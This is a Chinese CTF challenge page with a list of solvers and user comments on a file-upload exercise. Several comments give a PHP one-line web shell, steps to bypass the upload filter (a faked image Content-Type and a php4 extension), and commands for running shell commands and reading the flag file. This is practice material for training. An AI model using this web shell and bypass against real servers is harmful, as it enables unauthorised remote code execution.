评分(19)
解题动态
磊诺 攻破了该题 5小时前
hxp1989442012 攻破了该题 7小时前
FTJJJ 攻破了该题 8小时前
sycazdcy 攻破了该题 2天前
makker 攻破了该题 3天前
人间执子者 攻破了该题 4天前
66666ctfxr 攻破了该题 4天前
Zhengzanmei 攻破了该题 4天前
爱喝畅汁 攻破了该题 5天前
lee8ly 攻破了该题 6天前
hyj11125 攻破了该题 7天前
Ja5223 攻破了该题 7天前
SamJij 攻破了该题 7天前
沧颜 攻破了该题 8天前
hczking 攻破了该题 9天前
路痴通 攻破了该题 9天前
sqwq 攻破了该题 9天前
HexHackerCat 攻破了该题 10天前
yxrw 攻破了该题 10天前
评论
爱喝畅汁 5天前
举报
随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可
是小白鸭 25天前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)
李逍遥逛霍格沃茨 2月前
举报
能不能退金币 真被恶心到了
李逍遥逛霍格沃茨 2月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
李逍遥逛霍格沃茨 2月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
yuxuanlve 2月前
举报
为什么蚁剑死活连不上啊,改该的都改了啊,哥斯拉也连不上,评论全都看了一遍也没找到解决方案😭
ctfcaiji9527 2月前
举报
发现个问题,用yakit死活传不上去,用BP就行。( ╯□╰ )
jetxi 5月前
举报
php4和类型修改就可以绕过,可以放命令执行,或者直接蚁剑连,flag在根目录 data={'pass':"system('cat /flag');"}
desireart 6月前
举报
不知道,也没啥用,这种事情知道再多也没用,这辈子都知道不完
kaiyafanfan123 7月前
举报
而且正常图片上传,multipart/form-data 就合适